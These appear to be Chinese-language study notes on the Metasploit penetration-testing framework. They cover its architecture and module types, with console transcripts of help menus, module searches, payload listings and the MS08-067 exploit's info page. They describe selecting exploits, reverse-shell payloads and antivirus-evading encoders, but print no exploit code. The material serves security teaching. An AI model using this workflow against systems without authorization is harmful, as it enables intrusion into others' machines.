简介

目前最流行、最强大、最具扩展性的渗透测试平台软件基于Metasploit进行渗透测试和漏洞分析的流程和方法

2003年由HDMore发布第一版,2007年用 ruby 语言重写

  • 框架集成了渗透测试标准(PETS)思想
  • 一定程度上统一了渗透测试和漏洞研究的工作环境
  • 新的攻击代码可以比较容易的加入框架

开发活跃版本更新频繁(每周)

  • 早期版本基于社区力量维护,被 Rapid 7收购后打造出其商业版产品
  • 目前分化为四个版本,社区版本依然十分活跃
  • HD More说:为Metasploit写书是种自虐!
  • 2014年之后市场上没有再出现新的Metasploit教材

被HDMore称之为当时最好的Metasploit教材(2011/2012)
【Metasploit 渗透测试指南】

MSF架构

MSF架构

  • Rex

    • 基本功能库,用下完成日常基本任务,无需人工手动编码实现处理 - socket 连接访问、协议应答(http/SSL/SMB等)
    • 编码转换(XOR、Base64、Unicode )
  • Msf.:Core

    • 提供Msf的核心基本API,是框架的核心能力实现库
  • Msf::Base

    • 提供友好的API接口,便于模块调用的库
  • Plugin 插件

    • 连接和调用外部扩展功能和系统

MSF 默认集成于Kali Linux 之中

使用postgresql数据库存储数据早期版本需要先启动数据库再启动msf

启动命令:msfconsole

/usr/share/metasploit-framework/modules

技术功能模块(不是流程模块 )

  • Exploits:利用系统漏洞进行攻击的动作,此模块对应每一个具体漏洞的攻击方法(主动、被动)

  • Payload:成功exploit之后,真正在目标系统执行的代码或指令。

    • Shellcode 或系统命令

    • 三种 Payload : /usr/share/metasploit-framework/modules/payloads/

    • Single : all-in-one

    • Stager:目标计算机内存有限时,先传输一个较小的payload用于建立连接

    • Stages:利用stager建立的连接下载的后续payload

    • Stager、Stages都有多种类型,适用于不同场受

    • Shellcode是payload的一种,由于其建立正向/反向 shell 而得名

┌──(kali㉿kali)-[~]
└─$ cd /usr/share/metasploit-framework/  
                                                               
┌──(kali㉿kali)-[/usr/share/metasploit-framework]
└─$ ls
app                           modules          plugins
config                        msfconsole       Rakefile
data                          msfd             ruby
db                            msfdb            script-exploit
docs                          msf-json-rpc.ru  script-password
documentation                 msfrpc           script-recon
Gemfile                       msfrpcd          scripts
Gemfile.lock                  msfupdate        tools
lib                           msfvenom         vendor
metasploit-framework.gemspec  msf-ws.ru


┌──(kali㉿kali)-[/usr/share/metasploit-framework]
└─$ cd modules 
                                                               
┌──(kali㉿kali)-[/usr/share/metasploit-framework/modules]
└─$ ls
auxiliary  encoders  evasion  exploits  nops  payloads  post

┌──(kali㉿kali)-[/usr/share/metasploit-framework/modules]
└─$ cd exploits
                                                               
┌──(kali㉿kali)-[/usr/share/metasploit-framework/modules/exploits]
└─$ ls
aix        example_linux_priv_esc.rb  hpux       openbsd
android    example.py                 irix       osx
apple_ios  example.rb                 linux      qnx
bsd        example_webapp.rb          mainframe  solaris
bsdi       firefox                    multi      unix
dialup     freebsd                    netware    windows

┌──(kali㉿kali)-[/usr/share/metasploit-framework/modules]
└─$ ls
auxiliary  encoders  evasion  exploits  nops  payloads  post
                                                               
┌──(kali㉿kali)-[/usr/share/metasploit-framework/modules]
└─$ cd payloads
                                                               
┌──(kali㉿kali)-[/usr/share/metasploit-framework/modules/payloads]
└─$ ls
adapters  singles  stagers  stages
                                                               
┌──(kali㉿kali)-[/usr/share/metasploit-framework/modules/payloads]
└─$ cd singles 
                                                               
┌──(kali㉿kali)-[/usr/…/metasploit-framework/modules/payloads/singles]
└─$ ls
aix        bsd   firefox  linux      osx     r        tty
android    bsdi  generic  mainframe  php     ruby     windows
apple_ios  cmd   java     nodejs     python  solaris
                                                               
┌──(kali㉿kali)-[/usr/…/metasploit-framework/modules/payloads/singles]
└─$ cd php     
                                                               
┌──(kali㉿kali)-[/usr/…/modules/payloads/singles/php]
└─$ ls
bind_perl_ipv6.rb  exec.rb
bind_perl.rb       meterpreter_reverse_tcp.rb
bind_php_ipv6.rb   reverse_perl.rb
bind_php.rb        reverse_php.rb
download_exec.rb   shell_findsock.rb

技术功能模块(不是流程模块

  • Auxiliary:执行信息收集、枚举、指纹探测、扫描等功能的辅助模块(没有payload的exploit 模块)

  • Encoders:对payload进行加密,躲避AV检查的模块

  • Nops:提高 payload 稳定性及维持大小

┌──(kali㉿kali)-[/usr/share/metasploit-framework/modules]
└─$ ls
auxiliary  encoders  evasion  exploits  nops  payloads  post
                                                               
┌──(kali㉿kali)-[/usr/share/metasploit-framework/modules]
└─$ cd auxiliary
                                                               
┌──(kali㉿kali)-[/usr/share/metasploit-framework/modules/auxiliary]
└─$ ls
admin    cloud    example.py  gather   server   voip
analyze  crawler  example.rb  parser   sniffer  vsploit
bnat     docx     fileformat  pdf      spoof
client   dos      fuzzers     scanner  sqli

MSF 基本使用和控制台命令

基本使用

  • 使用前先升级:msfupdate

  • Msfcli 使用接口

  • Msfconsole 使用接口

    • 最流行的用户接口

    • 几乎可以使用全部MSF功能

    • 控制台命令支持 TAB 自动补齐支持外部命令的执行(系统命令等 )

    • 点击鼠标启动 /msfconsole -h -g -r -v / exit

    • help / ? / help vulns

──(root㉿kali)-[~]
└─# msfconsole
                                                  

                 _---------.                                   
             .' #######   ;."                                  
  .---,.    ;@             @@`;   .---,..                      
." @@@@@'.,'@@            @@@@@',.'@@@@ ".                     
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;                     
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'                     
     "--'.@@@  -.@        @ ,'-   .'--"                        
          ".@' ; @       @ `.  ;'                              
            |@@@@ @@@     @    .                               
             ' @@@ @@   @@    ,                                
              `.@@@@    @@   .                                 
                ',@@     @   ;           _____________         
                 (   3 C    )     /|___ / Metasploit! \        
                 ;@'. __*__,."    \|--- \_____________/        
                  '(.,...."/                                   


       =[ metasploit v6.2.26-dev                          ]
+ -- --=[ 2264 exploits - 1189 auxiliary - 404 post       ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: To save all commands executed since start up 
to a file, use the makerc command
Metasploit Documentation: https://docs.metasploit.com/

msf6 > help 
                                                                                                    
Core Commands                                                                                       
=============                                                                                       
                                                                                                    
    Command       Description                                                                       
    -------       -----------                                                                       
    ?             Help menu                                                                         
    banner        Display an awesome metasploit banner                                              
    cd            Change the current working directory                                              
    color         Toggle color                                                                      
    connect       Communicate with a host                                                           
    debug         Display information useful for debugging                                          
    exit          Exit the console                                                                  
    features      Display the list of not yet released features that can be opted in to             
    get           Gets the value of a context-specific variable                                     
    getg          Gets the value of a global variable                                               
    grep          Grep the output of another command                                                
    help          Help menu                                                                         
    history       Show command history                                                              
    load          Load a framework plugin                                                                         
    quit          Exit the console                                                                                
    repeat        Repeat a list of commands                                                                       
    route         Route traffic through a session                                                                 
    save          Saves the active datastores                                                                     
    sessions      Dump session listings and display information about sessions                                    
    set           Sets a context-specific variable to a value                                                     
    setg          Sets a global variable to a value                                                               
    sleep         Do nothing for the specified number of seconds
    spool         Write console output into a file as well the screen
    threads       View and manipulate background threads
    tips          Show a list of useful productivity tips
    unload        Unload a framework plugin
    unset         Unsets one or more context-specific variables
    unsetg        Unsets one or more global variables
    version       Show the framework and console library version numbers


Module Commands
===============

    Command       Description
    -------       -----------
    advanced      Displays advanced options for one or more modules
    back          Move back from the current context
    clearm        Clear the module stack
    favorite      Add module(s) to the list of favorite modules
    info          Displays information about one or more modules
    listm         List the module stack
    loadpath      Searches for and loads modules from a path
    options       Displays global options or for one or more modules
    popm          Pops the latest module off the stack and makes it active
    previous      Sets the previously loaded module as the current module
    pushm         Pushes the active or list of modules onto the module stack
    reload_all    Reloads all modules from all defined module paths
    search        Searches module names and descriptions
    show          Displays modules of a given type, or all modules
    use           Interact with a module by name or search term/index


Job Commands
============

    Command       Description
    -------       -----------
    handler       Start a payload handler as job
    jobs          Displays and manages jobs
    kill          Kill a job
    rename_job    Rename a job


Resource Script Commands
========================

    Command       Description
    -------       -----------
    makerc        Save commands entered since start to a file
    resource      Run the commands stored in a file


Database Backend Commands
=========================

    Command           Description
    -------           -----------
    analyze           Analyze database information about a specific address or address range
    db_connect        Connect to an existing data service
    db_disconnect     Disconnect from the current data service
    db_export         Export a file containing the contents of the database
    db_import         Import a scan result file (filetype will be auto-detected)
    db_nmap           Executes nmap and records the output automatically
    db_rebuild_cache  Rebuilds the database-stored module cache (deprecated)
    db_remove         Remove the saved data service entry
    db_save           Save the current data service connection as the default to reconnect on startup
    db_status         Show the current data service status
    hosts             List all hosts in the database
    loot              List all loot in the database
    notes             List all notes in the database
    services          List all services in the database
    vulns             List all vulnerabilities in the database
    workspace         Switch between database workspaces


Credentials Backend Commands
============================

    Command       Description
    -------       -----------
    creds         List all credentials in the database


Developer Commands
==================

    Command       Description
    -------       -----------
    edit          Edit the current module or a file with the preferred editor
    irb           Open an interactive Ruby shell in the current context
    log           Display framework.log paged to the end if possible
    pry           Open the Pry debugger on the current module or Framework
    reload_lib    Reload Ruby library files from specified paths
    time          Time how long it takes to run a particular command


msfconsole
==========

`msfconsole` is the primary interface to Metasploit Framework. There is quite a
lot that needs go here, please be patient and keep an eye on this space!

Building ranges and lists
-------------------------

Many commands and options that take a list of things can use ranges to avoid
having to manually list each desired thing. All ranges are inclusive.

### Ranges of IDs

Commands that take a list of IDs can use ranges to help. Individual IDs must be
separated by a `,` (no space allowed) and ranges can be expressed with either
`-` or `..`.

### Ranges of IPs

There are several ways to specify ranges of IP addresses that can be mixed
together. The first way is a list of IPs separated by just a ` ` (ASCII space),
with an optional `,`. The next way is two complete IP addresses in the form of
`BEGINNING_ADDRESS-END_ADDRESS` like `127.0.1.44-127.0.2.33`. CIDR
specifications may also be used, however the whole address must be given to
Metasploit like `127.0.0.0/8` and not `127/8`, contrary to the RFC.
Additionally, a netmask can be used in conjunction with a domain name to
dynamically resolve which block to target. All these methods work for both IPv4
and IPv6 addresses. IPv4 addresses can also be specified with special octet
ranges from the [NMAP target
specification](https://nmap.org/book/man-target-specification.html)

### Examples

Terminate the first sessions:

    sessions -k 1

Stop some extra running jobs:

    jobs -k 2-6,7,8,11..15

Check a set of IP addresses:

    check 127.168.0.0/16, 127.0.0-2.1-4,15 127.0.0.255

Target a set of IPv6 hosts:

    set RHOSTS fe80::3990:0000/110, ::1-::f0f0

Target a block from a resolved domain name:

    set RHOSTS www.example.test/24
msf6 > 

MSF控制台命令

  • Banner、Color、connect -h

  • show auxiliary / exploits / payloads / encoders / nops

  • search usermap script / help search

    • search name:mysal/ path:scada / platform:aix / type:aux/author:aaron/cve:2011 / 可多条件同时搜索
  • use dos/windows/smb/ms09 001 write

    • show options / payloads / targets / advanced / evasion
    • info edit
  • Check 、back

msf6 > banner

     .~+P``````-o+:.                                      -o+:.
.+oooyysyyssyyssyddh++os-`````                        ```````````````          `
+++++++++++++++++++++++sydhyoyso/:.````...`...-///::+ohhyosyyosyy/+om++:ooo///o
++++///////~~~~///////++++++++++++++++ooyysoyysosso+++++++++++++++++++///oossosy
--.`                 .-.-...-////+++++++++++++++////////~~//////++++++++++++///
                                `...............`              `...-/////...`


                                  .::::::::::-.                     .::::::-
                                .hmMMMMMMMMMMNddds\...//M\\.../hddddmMMMMMMNo
                                 :Nm-/NMMMMMMMMMMMMM$$NMMMMm&&MMMMMMMMMMMMMMy
                                 .sm/`-yMMMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMMh`
                                  -Nd`  :MMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMMh`
                                   -Nh` .yMMMMMMMMMM$$MMMMMN&&MMMMMMMMMMMm/
    `oo/``-hd:  ``                 .sNd  :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMm/
      .yNmMMh//+syysso-``````       -mh` :MMMMMMMMMM$$MMMMMN&&MMMMMMMMMMd
    .shMMMMN//dmNMMMMMMMMMMMMs`     `:```-o++++oooo+:/ooooo+:+o+++oooo++/
    `///omh//dMMMMMMMMMMMMMMMN/:::::/+ooso--/ydh//+s+/ossssso:--syN///os:
          /MMMMMMMMMMMMMMMMMMd.     `/++-.-yy/...osydh/-+oo:-`o//...oyodh+
          -hMMmssddd+:dMMmNMMh.     `.-=mmk.//^^^\\.^^`:++:^^o://^^^\\`::
          .sMMmo.    -dMd--:mN/`           ||--X--||          ||--X--||
........../yddy/:...+hmo-...hdd:............\\=v=//............\\=v=//.........
================================================================================
=====================+--------------------------------+=========================
=====================| Session one died of dysentery. |=========================
=====================+--------------------------------+=========================
================================================================================

                     Press ENTER to size up the situation

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%% Date: April 25, 1848 %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%% Weather: It's always cool in the lab %%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Health: Overweight %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%% Caffeine: 12975 mg %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%% Hacked: All the things %%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

                        Press SPACE BAR to continue



       =[ metasploit v6.2.26-dev                          ]
+ -- --=[ 2264 exploits - 1189 auxiliary - 404 post       ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: After running db_nmap, be sure to 
check out the result of hosts and services
Metasploit Documentation: https://docs.metasploit.com/

msf6 > banner
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%     %%%         %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                     
%%  %%  %%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                     
%%  %  %%%%%%%%   %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%                                     
%%  %%  %%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                     
%%  %%%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                     
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                     
%%%%%  %%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                     
%%%%    %%   %%%%%%%%%%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%  %%%%%                                     
%%%%  %%  %%  %      %%      %%    %%%%%      %    %%%%  %%   %%%%%%       %%                                     
%%%%  %%  %%  %  %%% %%%%  %%%%  %%  %%%%  %%%%  %% %%  %% %%% %%  %%%  %%%%%                                     
%%%%  %%%%%%  %%   %%%%%%   %%%%  %%%  %%%%  %%    %%  %%% %%% %%   %%  %%%%%                                     
%%%%%%%%%%%% %%%%     %%%%%    %%  %%   %    %%  %%%%  %%%%   %%%   %%%     %                                     
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%%%%% %%%%%%%%%%%%%%                                     
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%          %%%%%%%%%%%%%%                                     
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%                                     
                                                                                                                  

       =[ metasploit v6.2.26-dev                          ]
+ -- --=[ 2264 exploits - 1189 auxiliary - 404 post       ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Tired of setting RHOSTS for modules? Try 
globally setting it with setg RHOSTS x.x.x.x
Metasploit Documentation: https://docs.metasploit.com/

msf6 > 

msf6 > color
Usage: color <'true'|'false'|'auto'>

Enable or disable color output.

msf6 > color true

connect

msf6 > connect -h
Usage: connect [options] <host> <port>

Communicate with a host, similar to interacting via netcat, taking advantage of
any configured session pivoting.

OPTIONS:

    -c, --comm <comm>               Specify which Comm to use.
    -C, --crlf                      Try to use CRLF for EOL sequence.
    -h, --help                      Help banner.
    -i, --send-contents <file>      Send the contents of a file.
    -p, --proxies <proxies>         List of proxies to use.
    -P, --source-port <port>        Specify source port.
    -S, --source-address <address>  Specify source address.
    -s, --ssl                       Connect with SSL.
    -u, --udp                       Switch to a UDP socket.
    -w, --timeout <seconds>         Specify connect timeout.
    -z, --try-connection            Just try to connect, then return.
msf6 > 

show

msf6 > show
[-] Argument required

[*] Valid parameters for the "show" command are: all, encoders, nops, exploits, payloads, auxiliary, post, plugins, info, options, favorites
[*] Additional module-specific parameters are: missing, advanced, evasion, targets, actions


msf6 > show exploits 

Exploits
========

  #     Name                                                                               Disclosure Date  Rank       Check  Description
  -     ----                                                                               ---------------  ----       -----  -----------
  0     exploit/aix/local/ibstat_path                                                      2013-09-24       excellent  Yes    ibstat $PATH Privilege Escalation                                                                    
  1     exploit/aix/local/xorg_x11_server                                                  2018-10-25       great      Yes    Xorg X11 Server Local Privilege Escalation
  2     exploit/aix/rpc_cmsd_opcode21                                                      2009-10-07       great      No     AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
  3     exploit/aix/rpc_ttdbserverd_realpath                                               2009-06-17       great      No     ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
  4     exploit/android/adb/adb_server_exec                                                2016-01-01       excellent  Yes    Android ADB Debug Server Remote Payload Execution 


msf6 > show -h
[*] Valid parameters for the "show" command are: all, encoders, nops, exploits, payloads, auxiliary, post, plugins, info, options, favorites
[*] Additional module-specific parameters are: missing, advanced, evasion, targets, actions
msf6 > show payloads 

Payloads
========

  #    Name                                                                       Disclosure Date  Rank    Check  Description
  -    ----                                                                       ---------------  ----    -----  -----------
  0    payload/aix/ppc/shell_bind_tcp                                                              normal  No     AIX Command Shell, Bind TCP Inline
  1    payload/aix/ppc/shell_find_port                                                             normal  No     AIX Command Shell, Find Port Inline
  2    payload/aix/ppc/shell_interact                                                              normal  No     AIX execve Shell for inetd
  3    payload/aix/ppc/shell_reverse_tcp                                                           normal  No     AIX Command Shell, Reverse TCP Inline
  4    payload/android/meterpreter/reverse_http                                                    normal  No     Android Meterpreter, Android Reverse HTTP Stager
  5    payload/android/meterpreter/reverse_https                                                   normal  No     Android Meterpreter, Android Reverse HTTPS Stager
  6    payload/android/meterpreter/reverse_tcp                                                     normal  No     Android Meterpreter, Android Reverse TCP Stager
  7    payload/android/meterpreter_reverse_http                                                    normal  No     Android Meterpreter Shell, Reverse HTTP Inline
  8    payload/android/meterpreter_reverse_https                                                   normal  No     Android Meterpreter Shell, Reverse HTTPS Inline
  9    payload/android/meterpreter_reverse_tcp                                                     normal  No     Android Meterpreter Shell, Reverse TCP Inline
  
msf6 > search ms10-046

Matching Modules
================

   #  Name                                                         Disclosure Date  Rank       Check  Description
   -  ----                                                         ---------------  ----       -----  -----------
   0  exploit/windows/browser/ms10_046_shortcut_icon_dllloader     2010-07-16       excellent  No     Microsoft Windows Shell LNK Code Execution
   1  exploit/windows/fileformat/ms15_020_shortcut_icon_dllloader  2015-03-10       excellent  No     Microsoft Windows Shell LNK Code Execution
   2  exploit/windows/smb/ms10_046_shortcut_icon_dllloader         2010-07-16       excellent  No     Microsoft Windows Shell LNK Code Execution
   3  exploit/windows/smb/ms15_020_shortcut_icon_dllloader         2015-03-10       excellent  No     Microsoft Windows Shell LNK Code Execution


Interact with a module by name or index. For example info 3, use 3 or use exploit/windows/smb/ms15_020_shortcut_icon_dllloader  


msf6 > search -h
Usage: search [<options>] [<keywords>:<value>]

Prepending a value with '-' will exclude any matching results.
If no options or keywords are provided, cached results are displayed.


OPTIONS:

    -h, --help                      Help banner
    -I, --ignore                    Ignore the command if the only match has the same name as the search
    -o, --output <filename>         Send output to a file in csv format
    -r, --sort-descending <column>  Reverse the order of search results to descending order
    -S, --filter <filter>           Regex pattern used to filter search results
    -s, --sort-ascending <column>   Sort search results by the specified column in ascending order
    -u, --use                       Use module if there is one result

Keywords:
  aka              :  Modules with a matching AKA (also-known-as) name
  author           :  Modules written by this author
  arch             :  Modules affecting this architecture
  bid              :  Modules with a matching Bugtraq ID
  cve              :  Modules with a matching CVE ID
  edb              :  Modules with a matching Exploit-DB ID
  check            :  Modules that support the 'check' method
  date             :  Modules with a matching disclosure date
  description      :  Modules with a matching description
  fullname         :  Modules with a matching full name
  mod_time         :  Modules with a matching modification date
  name             :  Modules with a matching descriptive name
  path             :  Modules with a matching path
  platform         :  Modules affecting this platform
  port             :  Modules with a matching port
  rank             :  Modules with a matching rank (Can be descriptive (ex: 'good') or numeric with comparison operators (ex: 'gte400'))
  ref              :  Modules with a matching ref
  reference        :  Modules with a matching reference
  target           :  Modules affecting this target
  type             :  Modules of a specific type (exploit, payload, auxiliary, encoder, evasion, post, or nop)

Supported search columns:
  rank             :  Sort modules by their exploitabilty rank
  date             :  Sort modules by their disclosure date. Alias for disclosure_date
  disclosure_date  :  Sort modules by their disclosure date
  name             :  Sort modules by their name
  type             :  Sort modules by their type
  check            :  Sort modules by whether or not they have a check method

Examples:
  search cve:2009 type:exploit
  search cve:2009 type:exploit platform:-linux
  search cve:2009 -s name
  search type:exploit -s type -r
                                                                                                    

use

msf6 > use exploit/windows/smb/ms08_067_netapi 
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > info

       Name: MS08-067 Microsoft Server Service Relative Path Stack Corruption
     Module: exploit/windows/smb/ms08_067_netapi
   Platform: Windows
       Arch: 
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2008-10-28

Provided by:
  hdm <x@hdm.io>
  Brett Moore <brett.moore@insomniasec.com>
  frank2 <frank2@dc949.org>
  jduck <jduck@metasploit.com>

Available targets:
  Id  Name
  --  ----
  0   Automatic Targeting
  1   Windows 2000 Universal
  2   Windows XP SP0/SP1 Universal
  3   Windows 2003 SP0 Universal
  4   Windows XP SP2 English (AlwaysOn NX)
  5   Windows XP SP2 English (NX)
  6   Windows XP SP3 English (AlwaysOn NX)
  7   Windows XP SP3 English (NX)
  8   Windows XP SP2 Arabic (NX)
  9   Windows XP SP2 Chinese - Traditional / Taiwan (NX)
  10  Windows XP SP2 Chinese - Simplified (NX)
  11  Windows XP SP2 Chinese - Traditional (NX)
  12  Windows XP SP2 Czech (NX)
  13  Windows XP SP2 Danish (NX)
  14  Windows XP SP2 German (NX)
  15  Windows XP SP2 Greek (NX)
  16  Windows XP SP2 Spanish (NX)
  17  Windows XP SP2 Finnish (NX)
  18  Windows XP SP2 French (NX)
  19  Windows XP SP2 Hebrew (NX)
  20  Windows XP SP2 Hungarian (NX)
  21  Windows XP SP2 Italian (NX)
  22  Windows XP SP2 Japanese (NX)
  23  Windows XP SP2 Korean (NX)
  24  Windows XP SP2 Dutch (NX)
  25  Windows XP SP2 Norwegian (NX)
  26  Windows XP SP2 Polish (NX)
  27  Windows XP SP2 Portuguese - Brazilian (NX)
  28  Windows XP SP2 Portuguese (NX)
  29  Windows XP SP2 Russian (NX)
  30  Windows XP SP2 Swedish (NX)
  31  Windows XP SP2 Turkish (NX)
  32  Windows XP SP3 Arabic (NX)
  33  Windows XP SP3 Chinese - Traditional / Taiwan (NX)
  34  Windows XP SP3 Chinese - Simplified (NX)
  35  Windows XP SP3 Chinese - Traditional (NX)
  36  Windows XP SP3 Czech (NX)
  37  Windows XP SP3 Danish (NX)
  38  Windows XP SP3 German (NX)
  39  Windows XP SP3 Greek (NX)
  40  Windows XP SP3 Spanish (NX)
  41  Windows XP SP3 Finnish (NX)
  42  Windows XP SP3 French (NX)
  43  Windows XP SP3 Hebrew (NX)
  44  Windows XP SP3 Hungarian (NX)
  45  Windows XP SP3 Italian (NX)
  46  Windows XP SP3 Japanese (NX)
  47  Windows XP SP3 Korean (NX)
  48  Windows XP SP3 Dutch (NX)
  49  Windows XP SP3 Norwegian (NX)
  50  Windows XP SP3 Polish (NX)
  51  Windows XP SP3 Portuguese - Brazilian (NX)
  52  Windows XP SP3 Portuguese (NX)
  53  Windows XP SP3 Russian (NX)
  54  Windows XP SP3 Swedish (NX)
  55  Windows XP SP3 Turkish (NX)
  56  Windows 2003 SP1 English (NO NX)
  57  Windows 2003 SP1 English (NX)
  58  Windows 2003 SP1 Japanese (NO NX)
  59  Windows 2003 SP1 Spanish (NO NX)
  60  Windows 2003 SP1 Spanish (NX)
  61  Windows 2003 SP1 French (NO NX)
  62  Windows 2003 SP1 French (NX)
  63  Windows 2003 SP2 English (NO NX)
  64  Windows 2003 SP2 English (NX)
  65  Windows 2003 SP2 German (NO NX)
  66  Windows 2003 SP2 German (NX)
  67  Windows 2003 SP2 Portuguese (NX)
  68  Windows 2003 SP2 Portuguese - Brazilian (NX)
  69  Windows 2003 SP2 Spanish (NO NX)
  70  Windows 2003 SP2 Spanish (NX)
  71  Windows 2003 SP2 Japanese (NO NX)
  72  Windows 2003 SP2 French (NO NX)
  73  Windows 2003 SP2 French (NX)
  74  Windows 2003 SP2 Chinese - Simplified (NX)
  75  Windows 2003 SP2 Czech (NX)
  76  Windows 2003 SP2 Dutch (NX)
  77  Windows 2003 SP2 Hungarian (NX)
  78  Windows 2003 SP2 Italian (NX)
  79  Windows 2003 SP2 Russian (NX)
  80  Windows 2003 SP2 Swedish (NX)
  81  Windows 2003 SP2 Turkish (NX)

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wik
                                      i/Using-Metasploit
  RPORT    445              yes       The SMB service port (TCP)
  SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload information:
  Space: 408
  Avoid: 8 characters

Description:
  This module exploits a parsing flaw in the path canonicalization 
  code of NetAPI32.dll through the Server Service. This module is 
  capable of bypassing NX on some operating systems and service packs. 
  The correct target must be used to prevent the Server Service (along 
  with a dozen others in the same process) from crashing. Windows XP 
  targets seem to handle multiple successful exploitation events, but 
  2003 targets will often crash or hang on subsequent attempts. This 
  is just the first version of this module, full support for NX bypass 
  on 2003, along with other platforms, is still in development.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2008-4250
  OSVDB (49243)
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/MS08-067
  http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos


View the full module info with the info -d command.

  • db status / db rebuild cache

  • db nmap

    • Hosts / host 1.1.11 / hosts -u / hosts -c address,os flavor -S Linux

    • services -p 80 / services -c info,name -p 1-1000l

    • vulns / creds ( mysql login ) / loot ( hashdump )

  • db disconnect / db

    • connect- /usr/share/metasploit-framework/config/database.yml
  • db import / dbexport

    • db import /root/nmap.xml
    • db export -fxml /root/bak.xml
Database Backend Commands
=========================

    Command           Description
    -------           -----------
    analyze           Analyze database information about a specific address or address range
    db_connect        Connect to an existing data service
    db_disconnect     Disconnect from the current data service
    db_export         Export a file containing the contents of the database
    db_import         Import a scan result file (filetype will be auto-detected)
    db_nmap           Executes nmap and records the output automatically
    db_rebuild_cache  Rebuilds the database-stored module cache (deprecated)
    db_remove         Remove the saved data service entry
    db_save           Save the current data service connection as the default to reconnect on start
                      up
    db_status         Show the current data service status
    hosts             List all hosts in the database
    loot              List all loot in the database
    notes             List all notes in the database
    services          List all services in the database
    vulns             List all vulnerabilities in the database
    workspace         Switch between database workspaces

msf6 > db_status
[*] postgresql selected, no connection
msf6 > exit
              

┌──(kali㉿kali)-[~]
└─$ msfdb start
[-] Error: /usr/bin/msfdb must be run as root
                                                                                                     
┌──(kali㉿kali)-[~]
└─$ sudo su -                             
[sudo] password for kali: 
┌──(root㉿kali)-[~]
└─# msfdb start
[+] Starting database

netstat -pantu l grep 5432

如果 msfdb start 无效,可先通过netstat -pantu | grep 5432 查看是否启动服务端口,如果还是不行就通过service postgresql start

msfdb start

msf6 > hosts -h
Usage: hosts [ options ] [addr1 addr2 ...]


OPTIONS:

    -a, --add <host>                       Add the hosts instead of searching
    -c, --columns <columns>                Only show the given columns (see list below)
    -C, --columns-until-restart <columns>  Only show the given columns until the next restart (see list below)
    -d, --delete <hosts>                   Delete the hosts instead of searching
    -h, --help                             Show this help information
    -i, --info <info>                      Change the info of a host
    -m, --comment <comment>                Change the comment of a host
    -n, --name <name>                      Change the name of a host
    -O, --order <column id>                Order rows by specified column number
    -o, --output <filename>                Send output to a file in csv format
    -R, --rhosts                           Set RHOSTS from the results of the search
    -S, --search <filter>                  Search string to filter by
    -T, --delete-tag <tag>                 Remove a tag from a range of hosts
    -t, --tag <tag>                        Add or specify a tag to a range of hosts
    -u, --up                               Only show hosts which are up

Available columns: address, arch, comm, comments, created_at, cred_count, detected_arch, exploit_attempt_count, host_detail_count, info, mac, name, note_count, os_family, os_flavor, os_lang, os_name, os_sp, purpose, scope, service_count, state, updated_at, virtual_host, vuln_count, tags


msf6 > service -h
[*] exec: service -h

Usage: service < option > | --status-all | [ service_name [ command | --full-restart ] ]


